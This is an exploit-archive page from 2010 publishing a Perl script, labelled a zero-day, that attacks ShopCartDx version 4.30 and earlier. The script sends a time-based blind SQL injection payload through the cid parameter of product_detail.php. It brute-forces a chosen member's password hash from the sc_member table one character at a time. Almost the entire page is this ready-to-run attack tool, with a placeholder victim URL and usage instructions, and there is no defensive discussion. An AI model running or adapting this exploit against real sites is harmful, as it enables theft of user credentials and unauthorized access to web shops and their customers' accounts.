ShopCartDx <= v4.30 (product_detail.php) Blind SQL Inject

Posted on 30 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>ShopCartDx &lt;= v4.30 (product_detail.php) Blind SQL Injection Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>====================================================================
ShopCartDx &lt;= v4.30 (product_detail.php) Blind SQL Injection Exploit
====================================================================


#!/usr/bin/perl
#[0-Day] ShopCartDx &lt;= v4.30 (product_detail.php) Remote Blind SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew

use strict;
use LWP::UserAgent;

use HTTP::Request::Common;
use Time::HiRes;
use IO::Socket;

my ($Hash,$Time,$Time_Start,$Time_End,$Response);
my($Start,$End);
my @chars = (48,49,50,51,52,53,54,55,56,57,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122);
my $Host = &quot;http://www.victime_site.org/path/&quot;; #Insert Victime Web Site Link (Example: http://e-topbiz.com/trafficdemos/shopcartdx1/)
my $Member_ID  = shift or &amp;usage;
my $Method = HTTP::Request-&gt;new(GET =&gt; $Host);
my $HTTP = new LWP::UserAgent;
my $Referrer = &quot;http://www.warwolfz.org/&quot;;
my $DefaultTime = request($Referrer);

sub Blind_SQL_Jnjection{
	my ($dec,$hex) = @_;
	return &quot;./product_detail.php?cid=-1 OR 1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `sc_member` WHERE `mid`=${Member_ID})/*&quot;;
}

for(my $I=1; $I&lt;=15; $I++){ #N Hash characters
	for(my $J=0; $J&lt;=62; $J++){ #0-9, A-Z, a-z
		$Time_Start = time();
		$HTTP-&gt;get($Host.Blind_SQL_Jnjection($I,$chars[$J]));
		$Time_End = time();
		$Time = request($Referrer);
		refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);
		if($Time_End - $Time_Start &gt; 6){
			$Time = request($Referrer);
			refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);
			if($Time_End - $Time_Start &gt; 6){
				syswrite(STDOUT,chr($chars[$J]));
				$Hash .= chr($chars[$J]);
				$Time = request($Referrer);
				refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);
				last;
			}
		}
	}
	if($I == 1 &amp;&amp; length $Hash &lt; 0 &amp;&amp; !$Hash){
		print &quot; * Exploit Failed                                     *
&quot;;
		print &quot; ------------------------------------------------------ 
&quot;;
		exit;
	}
	if($I == 15 || length $Hash &lt; $I){
		print &quot; * Exploit Successfully Executed                      *
&quot;;
		print &quot; ------------------------------------------------------
 &quot;;
		system(&quot;pause&quot;);
	}
}

sub usage{
	system(&quot;cls&quot;);
	{
		print &quot; 
 [0-Day] ShopCartDx &lt;= v4.30 (product_detail.php) Remote Blind SQL Injection Exploit
&quot;;
		print &quot; ------------------------------------------------------ 
&quot;;
		print &quot; * USAGE:                                             *
&quot;;
		print &quot; * cd [Local Disk]:\[Directory Of Exploit]\           *
&quot;;
		print &quot; * perl name_exploit.pl [uid]                         *
&quot;;
		print &quot; ------------------------------------------------------ 
&quot;;
		print &quot; *         Powered By Dante90, WaRWolFz Crew          *
&quot;;
		print &quot; * www.warwolfz.org - dante90_founder[at]warwolfz.org *
&quot;;
		print &quot; ------------------------------------------------------ 
&quot;;
	};
	exit;
}

sub request{
	$Referrer = $_[0];
	$Method-&gt;referrer($Referrer);
	$Start = Time::HiRes::time();
	$Response = $HTTP-&gt;request($Method);
	$Response-&gt;is_success() or die &quot;$Host : &quot;, $Response-&gt;message,&quot;
&quot;;
	$End = Time::HiRes::time();
	$Time = $End - $Start;
	return $Time;
}

sub refresh{
	system(&quot;cls&quot;);
	{
		print &quot; 
 [0-Day] ShopCartDx &lt;= v4.30 (product_detail.php) Remote Blind SQL Injection Exploit
&quot;;
		print &quot; ------------------------------------------------------ 
&quot;;
		print &quot; * USAGE:                                             *
&quot;;
		print &quot; * cd [Local Disk]:\[Directory Of Exploit]\           *
&quot;;
		print &quot; * perl name_exploit.pl [uid]                         *
&quot;;
		print &quot; ------------------------------------------------------ 
&quot;;
		print &quot; *         Powered By Dante90, WaRWolFz Crew          *
&quot;;
		print &quot; * www.warwolfz.org - dante90_founder[at]warwolfz.org *
&quot;;
		print &quot; ------------------------------------------------------ 
&quot;;
	};
	print &quot; * Victime Site: &quot; . $_[0] . &quot;
&quot;;
	print &quot; * Default Time: &quot; . $_[1] . &quot; seconds
&quot;;
	print &quot; * BruteForcing Hash: &quot; . chr($chars[$_[2]]) . &quot;
&quot;;
	print &quot; * BruteForcing N Char Hash: &quot; . $_[5] . &quot;
&quot;;
	print &quot; * SQL Time: &quot; . $_[4] . &quot; seconds
&quot;;
	print &quot; * Password: &quot; . $_[3] . &quot;
&quot;;
}

#WaRWolFz Crew


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-30]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20